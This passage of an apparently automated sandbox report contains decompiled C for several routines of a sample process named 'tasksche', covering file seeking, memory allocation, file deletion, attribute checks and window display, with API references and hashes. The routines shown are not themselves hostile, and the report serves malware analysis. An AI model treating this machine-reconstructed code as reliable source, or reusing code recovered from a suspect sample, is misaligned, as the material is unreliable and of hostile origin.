                                                                                              				long _v8;
                                                                                              				void* __ebp;
                                                                                              				void* _t16;
                                                                                              				long _t20;
                                                                                              				void* _t22;
                                                                                              				void* _t25;
                                                                                              				long _t27;
                                                                                              				intOrPtr* _t30;
                                                                                              				long _t33;
                                                                                              
                                                                                              				_t24 = __ecx;
                                                                                              				_push(__ecx);
                                                                                              				_t30 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
                                                                                              					L12:
                                                                                              					_t16 = 1;
                                                                                              				} else {
                                                                                              					_t27 = _a8;
                                                                                              					_t33 = _t27;
                                                                                              					if(_t33 <= 0 && (_t33 < 0 || _a4 < 0) && _a12 != 0) {
                                                                                              						if(_a12 != 1) {
                                                                                              							_t22 = E00408E03(_t24, _t25);
                                                                                              						} else {
                                                                                              							_t22 =  *((intOrPtr*)( *_t30 + 0x10))();
                                                                                              						}
                                                                                              						_a4 = _a4 + _t22;
                                                                                              						asm("adc edi, edx");
                                                                                              						_a12 = _a12 & 0x00000000;
                                                                                              					}
                                                                                              					_v8 = _t27;
                                                                                              					_t20 = SetFilePointer( *(_t30 + 4), _a4,  &_v8, _a12); // executed
                                                                                              					if(_t20 != 0xffffffff || GetLastError() == 0) {
                                                                                              						goto L12;
                                                                                              					} else {
                                                                                              						_t16 = 0;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t16;
                                                                                              			}












                                                                                              0x00408f4b
                                                                                              0x00408f4e
                                                                                              0x00408f50
                                                                                              0x00408f56
                                                                                              0x00408fb8
                                                                                              0x00408fb8
                                                                                              0x00408f58
                                                                                              0x00408f59
                                                                                              0x00408f5c
                                                                                              0x00408f5e
                                                                                              0x00408f72
                                                                                              0x00408f7b
                                                                                              0x00408f74
                                                                                              0x00408f76
                                                                                              0x00408f76
                                                                                              0x00408f80
                                                                                              0x00408f83
                                                                                              0x00408f85
                                                                                              0x00408f85
                                                                                              0x00408f98
                                                                                              0x00408f9e
                                                                                              0x00408fa8
                                                                                              0x00000000
                                                                                              0x00408fb4
                                                                                              0x00408fb4
                                                                                              0x00408fb4
                                                                                              0x00408fa8
                                                                                              0x00408fbc

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,?,00000001,00000000,?,?,?,?,00408FD1,00000000,00000000,00000000,?,00407DE2,?,?), ref: 00408F9E
                                                                                              • GetLastError.KERNEL32(00408FD1,00000000,00000000,00000000,?,00407DE2,?,?,?,?,?,?,?,?), ref: 00408FAA
                                                                                                • Part of subcall function 00408E03: __EH_prolog.LIBCMT ref: 00408E08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileH_prologLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 4236474358-0
                                                                                              • Opcode ID: fcb39ab4431aa7e293366899b2db99d4a95afe2178fb6d1211a042b2fb6e45d7
                                                                                              • Instruction ID: 31f7e80921147255a447777291f97898e209bd40052f61b908ef1a5d0e3b9beb
                                                                                              • Opcode Fuzzy Hash: fcb39ab4431aa7e293366899b2db99d4a95afe2178fb6d1211a042b2fb6e45d7
                                                                                              • Instruction Fuzzy Hash: 1E019631200306DBCF248F64CD046AE776ABF813A5F14463EF8A1A22D0DB78D951DA55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 71%
                                                                                              			E0041A89A(void* __ebx, void* __edx, void* __edi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                              				signed int _v0;
                                                                                              				char _v16;
                                                                                              				intOrPtr _v28;
                                                                                              				signed int _v32;
                                                                                              				signed int _v36;
                                                                                              				signed int _v40;
                                                                                              				void* _t39;
                                                                                              				signed int _t40;
                                                                                              				signed int _t46;
                                                                                              				void* _t51;
                                                                                              				void* _t53;
                                                                                              				intOrPtr* _t56;
                                                                                              				intOrPtr* _t58;
                                                                                              				void* _t62;
                                                                                              				void* _t74;
                                                                                              				void* _t75;
                                                                                              				signed int _t76;
                                                                                              				signed int _t79;
                                                                                              
                                                                                              				_t75 = __edi;
                                                                                              				_t74 = __edx;
                                                                                              				_t62 = __ebx;
                                                                                              				while(1) {
                                                                                              					_t39 = E0041CF3E(_t62, _t74, _t75, _a4); // executed
                                                                                              					if(_t39 != 0) {
                                                                                              						break;
                                                                                              					}
                                                                                              					_t40 = E0041FC9B(_a4);
                                                                                              					__eflags = _t40;
                                                                                              					if(_t40 == 0) {
                                                                                              						__eflags =  *0x44f810 & 0x00000001;
                                                                                              						if(( *0x44f810 & 0x00000001) == 0) {
                                                                                              							 *0x44f810 =  *0x44f810 | 0x00000001;
                                                                                              							__eflags =  *0x44f810;
                                                                                              							E0041216A(0x44f804);
                                                                                              							E0041C9CF( *0x44f810, 0x4299d0);
                                                                                              						}
                                                                                              						E004125FA( &_v16, 0x44f804);
                                                                                              						E0041C77F( &_v16, 0x42d504);
                                                                                              						asm("int3");
                                                                                              						_push(_t62);
                                                                                              						__eflags = _v0;
                                                                                              						if(__eflags != 0) {
                                                                                              							_push(0x44f804);
                                                                                              							_t79 = _a4;
                                                                                              							_push(_t75);
                                                                                              							_t76 = _a8;
                                                                                              							__eflags = _t76;
                                                                                              							if(_t76 == 0) {
                                                                                              								L12:
                                                                                              								_v28 = 0x42;
                                                                                              								_v32 = _t79;
                                                                                              								_v40 = _t79;
                                                                                              								__eflags = _t76 - 0x3fffffff;
                                                                                              								if(_t76 <= 0x3fffffff) {
                                                                                              									_v36 = _t76 + _t76;
                                                                                              								} else {
                                                                                              									_v36 = 0x7fffffff;
                                                                                              								}
                                                                                              								_t46 = _v0( &_v40, _a12, _a16, _a20);
                                                                                              								_a12 = _t46;
                                                                                              								__eflags = _t79;
                                                                                              								if(_t79 != 0) {
                                                                                              									__eflags = _t46;
                                                                                              									if(_t46 < 0) {
                                                                                              										L24:
                                                                                              										__eflags = _v36;
                                                                                              										 *((short*)(_t79 + _t76 * 2 - 2)) = 0;
                                                                                              										_t46 = 0 | _v36 >= 0x00000000;
                                                                                              										__eflags = _t46;
                                                                                              									} else {
                                                                                              										_t22 =  &_v36;
                                                                                              										 *_t22 = _v36 - 1;
                                                                                              										__eflags =  *_t22;
                                                                                              										if( *_t22 < 0) {
                                                                                              											_t51 = E0041FE68(_t74, _t76, 0,  &_v40);
                                                                                              											__eflags = _t51 - 0xffffffff;
                                                                                              											if(_t51 == 0xffffffff) {
                                                                                              												goto L24;
                                                                                              											} else {
                                                                                              												goto L20;
                                                                                              											}
                                                                                              										} else {
                                                                                              											 *_v40 = 0;
                                                                                              											_v40 = _v40 + 1;
                                                                                              											L20:
                                                                                              											_t28 =  &_v36;
                                                                                              											 *_t28 = _v36 - 1;
                                                                                              											__eflags =  *_t28;
                                                                                              											if( *_t28 < 0) {
                                                                                              												_t53 = E0041FE68(_t74, _t76, 0,  &_v40);
                                                                                              												__eflags = _t53 - 0xffffffff;
                                                                                              												if(_t53 == 0xffffffff) {
                                                                                              													goto L24;
                                                                                              												} else {
                                                                                              													goto L23;
                                                                                              												}
                                                                                              											} else {
                                                                                              												 *_v40 = 0;
                                                                                              												L23:
                                                                                              												_t46 = _a12;
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								__eflags = _t79;
                                                                                              								if(__eflags != 0) {
                                                                                              									goto L12;
                                                                                              								} else {
                                                                                              									_t56 = E0041EDAE(__eflags);
                                                                                              									_push(0);
                                                                                              									_push(0);
                                                                                              									_push(0);
                                                                                              									_push(0);
                                                                                              									_push(0);
                                                                                              									 *_t56 = 0x16;
                                                                                              									_t46 = E00420103(_t74, _t76, _t79) | 0xffffffff;
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t58 = E0041EDAE(__eflags);
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							 *_t58 = 0x16;
                                                                                              							_t46 = E00420103(_t74, _t75, 0x44f804) | 0xffffffff;
                                                                                              						}
                                                                                              						return _t46;
                                                                                              					} else {
                                                                                              						continue;
                                                                                              					}
                                                                                              					L27:
                                                                                              				}
                                                                                              				return _t39;
                                                                                              				goto L27;
                                                                                              			}





















                                                                                              0x0041a89a
                                                                                              0x0041a89a
                                                                                              0x0041a89a
                                                                                              0x0041a8b1
                                                                                              0x0041a8b4
                                                                                              0x0041a8bc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041a8a7
                                                                                              0x0041a8ad
                                                                                              0x0041a8af
                                                                                              0x0041a8c0
                                                                                              0x0041a8cc
                                                                                              0x0041a8ce
                                                                                              0x0041a8ce
                                                                                              0x0041a8d7
                                                                                              0x0041a8e1
                                                                                              0x0041a8e6
                                                                                              0x0041a8eb
                                                                                              0x0041a8f9
                                                                                              0x0041a8fe
                                                                                              0x0041a907
                                                                                              0x0041a90a
                                                                                              0x0041a90d
                                                                                              0x0041a92f
                                                                                              0x0041a930
                                                                                              0x0041a933
                                                                                              0x0041a934
                                                                                              0x0041a937
                                                                                              0x0041a939
                                                                                              0x0041a95f
                                                                                              0x0041a95f
                                                                                              0x0041a966
                                                                                              0x0041a969
                                                                                              0x0041a96c
                                                                                              0x0041a972
                                                                                              0x0041a980
                                                                                              0x0041a974
                                                                                              0x0041a974
                                                                                              0x0041a974
                                                                                              0x0041a990
                                                                                              0x0041a996
                                                                                              0x0041a999
                                                                                              0x0041a99b
                                                                                              0x0041a99d
                                                                                              0x0041a99f
                                                                                              0x0041a9e3
                                                                                              0x0041a9e5
                                                                                              0x0041a9e8
                                                                                              0x0041a9f1
                                                                                              0x0041a9f1
                                                                                              0x0041a9a1
                                                                                              0x0041a9a1
                                                                                              0x0041a9a1
                                                                                              0x0041a9a1
                                                                                              0x0041a9a4
                                                                                              0x0041a9b5
                                                                                              0x0041a9bc
                                                                                              0x0041a9bf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041a9a6
                                                                                              0x0041a9a9
                                                                                              0x0041a9ab
                                                                                              0x0041a9c1
                                                                                              0x0041a9c1
                                                                                              0x0041a9c1
                                                                                              0x0041a9c1
                                                                                              0x0041a9c4
                                                                                              0x0041a9d2
                                                                                              0x0041a9d9
                                                                                              0x0041a9dc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041a9c6
                                                                                              0x0041a9c9
                                                                                              0x0041a9de
                                                                                              0x0041a9de
                                                                                              0x0041a9de
                                                                                              0x0041a9c4
                                                                                              0x0041a9a4
                                                                                              0x0041a99f
                                                                                              0x0041a93b
                                                                                              0x0041a93b
                                                                                              0x0041a93d
                                                                                              0x00000000
                                                                                              0x0041a93f
                                                                                              0x0041a93f
                                                                                              0x0041a944
                                                                                              0x0041a945
                                                                                              0x0041a946
                                                                                              0x0041a947
                                                                                              0x0041a948
                                                                                              0x0041a949
                                                                                              0x0041a957
                                                                                              0x0041a957
                                                                                              0x0041a93d
                                                                                              0x0041a90f
                                                                                              0x0041a90f
                                                                                              0x0041a914
                                                                                              0x0041a915
                                                                                              0x0041a916
                                                                                              0x0041a917
                                                                                              0x0041a918
                                                                                              0x0041a919
                                                                                              0x0041a927
                                                                                              0x0041a927
                                                                                              0x0041a9f6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041a8af
                                                                                              0x0041a8bf
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 0041A8B4
                                                                                                • Part of subcall function 0041CF3E: __FF_MSGBANNER.LIBCMT ref: 0041CF61
                                                                                                • Part of subcall function 0041CF3E: __NMSG_WRITE.LIBCMT ref: 0041CF68
                                                                                                • Part of subcall function 0041CF3E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004212F4,00000000,00000001,00000000,?,0041EF2D,00000018,0042D930,0000000C,0041EFBE), ref: 0041CFB5
                                                                                              • __CxxThrowException@8.LIBCMT ref: 0041A8F9
                                                                                                • Part of subcall function 0041216A: std::exception::exception.LIBCMT ref: 00412174
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1264268182-0
                                                                                              • Opcode ID: 488aefbad45324ff37e950e4da10f49f42e7f09e4ea378ab16e103540516bcd1
                                                                                              • Instruction ID: 42064790ed8d2a037bfba99cbedd4ff18ff19c5b52db1d8e26b3e688ef0b8114
                                                                                              • Opcode Fuzzy Hash: 488aefbad45324ff37e950e4da10f49f42e7f09e4ea378ab16e103540516bcd1
                                                                                              • Instruction Fuzzy Hash: 64F0E23160021972CB047B22ED46ACE37586F01728B10403BFC1199192DFAC9ADA919E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004090E4(WCHAR* _a4) {
                                                                                              				short _v4100;
                                                                                              				int _t11;
                                                                                              				signed int _t17;
                                                                                              				signed int _t18;
                                                                                              
                                                                                              				E0041AAF0(0x1000);
                                                                                              				_t11 = DeleteFileW(_a4); // executed
                                                                                              				_t18 = _t17 & 0xffffff00 | _t11 != 0x00000000;
                                                                                              				if(_t18 == 0 && E0040A3DC(_a4,  &_v4100, 0x800) != 0) {
                                                                                              					_t18 = _t18 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
                                                                                              				}
                                                                                              				return _t18;
                                                                                              			}







                                                                                              0x004090ec
                                                                                              0x004090fc
                                                                                              0x00409100
                                                                                              0x00409105
                                                                                              0x0040912a
                                                                                              0x0040912a
                                                                                              0x00409132

                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(?,?,-00000011,?,0040877F,?,?,00000001,?,?,?,?,?,?,00000000,?), ref: 004090FC
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000800,?,0040877F,?,?,00000001,?,?,?,?,?,?,00000000), ref: 00409126
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: 0a42f7c6465a65df2585c125a2f12a68c0d7bb240ddda169d7c29578124ac562
                                                                                              • Instruction ID: c332a15ca0b0e5e82477794df9822c7aeed54c7470201c7e9f38434531037f1b
                                                                                              • Opcode Fuzzy Hash: 0a42f7c6465a65df2585c125a2f12a68c0d7bb240ddda169d7c29578124ac562
                                                                                              • Instruction Fuzzy Hash: DBE02B3114122AA7EB00A620DC01FDA3B5C9F043C0F0440737C80E71D1DB75DCE0D9A4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00409041(WCHAR* _a4) {
                                                                                              				short _v4100;
                                                                                              				long _t7;
                                                                                              				long _t12;
                                                                                              				long _t13;
                                                                                              
                                                                                              				E0041AAF0(0x1000);
                                                                                              				_t7 = GetFileAttributesW(_a4); // executed
                                                                                              				_t13 = _t7;
                                                                                              				if(_t13 == 0xffffffff && E0040A3DC(_a4,  &_v4100, 0x800) != 0) {
                                                                                              					_t12 = GetFileAttributesW( &_v4100); // executed
                                                                                              					_t13 = _t12;
                                                                                              				}
                                                                                              				return _t13;
                                                                                              			}







                                                                                              0x00409049
                                                                                              0x00409059
                                                                                              0x0040905b
                                                                                              0x00409060
                                                                                              0x00409081
                                                                                              0x00409083
                                                                                              0x00409083
                                                                                              0x0040908a

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,004092AE,?,00406796,?,?,?,?), ref: 00409059
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,004092AE,?,00406796,?,?,?,?), ref: 00409081
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: b25c0f1027ae8764d85bcc1b21548e8f0eb716d18d4362393a4ff3fac8f95358
                                                                                              • Instruction ID: f0aa2148c7acefeba2e85b7bc3a11c2245577506fd5686bf0be3bfe97b3e7ecd
                                                                                              • Opcode Fuzzy Hash: b25c0f1027ae8764d85bcc1b21548e8f0eb716d18d4362393a4ff3fac8f95358
                                                                                              • Instruction Fuzzy Hash: BBE092326101186ACB10A669DC00BDE379D9BC83E5F0401B3BE44E32D5DAB4DD95CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3011073432-0
                                                                                              • Opcode ID: 8034b9b9aa660211ead63cdf03b6a57d34fff27c13a9ae0071d7a28958d0b1e9
                                                                                              • Instruction ID: 335ddef7e6713e4d0d4f603cdcadd61df7388e1f4a4116fbf7552c9c9eb2c210
                                                                                              • Opcode Fuzzy Hash: 8034b9b9aa660211ead63cdf03b6a57d34fff27c13a9ae0071d7a28958d0b1e9
                                                                                              • Instruction Fuzzy Hash: 02F0EC75A0420866E711B7A1CC07F9B36589B09789F04047FB601760F3D9795564479A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00410EDB(void* __ecx) {
                                                                                              				long _v8;
                                                                                              				long _v12;
                                                                                              				int _t8;
                                                                                              				void* _t11;
                                                                                              				signed int _t14;
                                                                                              
                                                                                              				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
                                                                                              				if(_t8 == 0) {
                                                                                              					L6:
                                                                                              					return 1;
                                                                                              				}
                                                                                              				_t11 = 0;
                                                                                              				_t14 = 1;
                                                                                              				do {
                                                                                              					if((_v8 & _t14) != 0) {
                                                                                              						_t11 = _t11 + 1;
                                                                                              					}
                                                                                              					_t14 = _t14 + _t14;
                                                                                              				} while (_t14 != 0);
                                                                                              				if(_t11 < 1) {
                                                                                              					goto L6;
                                                                                              				}
                                                                                              				return _t11;
                                                                                              			}








                                                                                              0x00410eef
                                                                                              0x00410ef7
                                                                                              0x00410f0d
                                                                                              0x00000000
                                                                                              0x00410f0f
                                                                                              0x00410efb
                                                                                              0x00410efd
                                                                                              0x00410efe
                                                                                              0x00410f01
                                                                                              0x00410f03
                                                                                              0x00410f03
                                                                                              0x00410f04
                                                                                              0x00410f04
                                                                                              0x00410f0b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00410f11

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,?,?,00410F17,00409FF4), ref: 00410EE8
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00410EEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: 5b6efae98f4fd143c9c11739b7a9d49426725563ed325c59bf560736ad01bde8
                                                                                              • Instruction ID: ae3045e16ef29d64dcafac8e7d0c22bbd438388315c71f77e1501110187c073f
                                                                                              • Opcode Fuzzy Hash: 5b6efae98f4fd143c9c11739b7a9d49426725563ed325c59bf560736ad01bde8
                                                                                              • Instruction Fuzzy Hash: 86E08672A1020AA78F2897A0CD4A9EF32ACEB01215700087BE503C1640EAF8D5D24629
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 58%
                                                                                              			E004060C9(struct HWND__* _a4, int _a8, signed char _a12) {
                                                                                              				int _t8;
                                                                                              
                                                                                              				asm("sbb eax, eax");
                                                                                              				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
                                                                                              				return _t8;
                                                                                              			}




                                                                                              0x004060d0
                                                                                              0x004060e5
                                                                                              0x004060eb

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              • Opcode ID: 76029219059209f4090a36f07538af165f69a2de4b0c3b600f66da5fa765a026
                                                                                              • Instruction ID: 00e924dde3bcd55588ca107b376b403c6fb897f844ebcc5e5070703d20151260
                                                                                              • Opcode Fuzzy Hash: 76029219059209f4090a36f07538af165f69a2de4b0c3b600f66da5fa765a026
                                                                                              • Instruction Fuzzy Hash: E7C01232258241FFCB020BB0DC09E2ABBA8ABA5312F10CD68B4A5C1160C23AC024DB22
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E00402C8B(void* __ecx, signed int __edx) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				char _t69;
                                                                                              				signed int _t75;
                                                                                              				intOrPtr _t84;
                                                                                              				signed int _t88;
                                                                                              				intOrPtr _t96;
                                                                                              				signed int _t116;
                                                                                              				void* _t139;
                                                                                              				void* _t147;
                                                                                              
                                                                                              				_t134 = __edx;
                                                                                              				E0041A4DC(E00429577, _t147);
                                                                                              				E0041AAF0(0xe6e0);
                                                                                              				_t141 = __ecx;
                                                                                              				if( *((char*)(__ecx + 0xb064)) == 0) {
                                                                                              					__eflags =  *((char*)(__ecx + 0x8942)) - 5;
                                                                                              					if( *((char*)(__ecx + 0x8942)) > 5) {
                                                                                              						L26:
                                                                                              						_t142 = _t141 + 0x1e;
                                                                                              						__eflags = _t141 + 0x1e;
                                                                                              						E00406376(0x1c, _t142);
                                                                                              						goto L27;
                                                                                              					}
                                                                                              					asm("sbb eax, eax");
                                                                                              					__eflags = ( *(__ecx + 0x8941) & 0x000000ff) - ( ~( *((intOrPtr*)(__ecx + 0xb050)) - 3) & 0x0000001d);
                                                                                              					if(( *(__ecx + 0x8941) & 0x000000ff) > ( ~( *((intOrPtr*)(__ecx + 0xb050)) - 3) & 0x0000001d)) {
                                                                                              						goto L26;
                                                                                              					}
                                                                                              					_t75 =  *(__ecx + 0x9970) |  *(__ecx + 0x9974);
                                                                                              					__eflags = _t75;
                                                                                              					if(_t75 != 0) {
                                                                                              						L7:
                                                                                              						_t139 = _t141 + 0x20e8;
                                                                                              						E0040B758(_t139);
                                                                                              						_push(_t139);
                                                                                              						E0041768A(_t147 - 0xe6ec, _t134, _t139, __eflags); // executed
                                                                                              						_t106 = 0;
                                                                                              						 *(_t147 - 4) = 0;
                                                                                              						E004126F0(_t147 - 0xe6ec,  *((intOrPtr*)(_t141 + 0x9a0c)), 0); // executed
                                                                                              						__eflags =  *(_t147 + 0xc);
                                                                                              						if( *(_t147 + 0xc) != 0) {
                                                                                              							L16:
                                                                                              							__eflags =  *((char*)(_t141 + 0x99b3));
                                                                                              							if( *((char*)(_t141 + 0x99b3)) == 0) {
                                                                                              								L19:
                                                                                              								_t106 = _t141 + 0x9988;
                                                                                              								E00409885(_t141 + 0x59b8,  *(_t141 + 0x9988), 1);
                                                                                              								 *((intOrPtr*)(_t141 + 0x210c)) =  *((intOrPtr*)(_t141 + 0x9974));
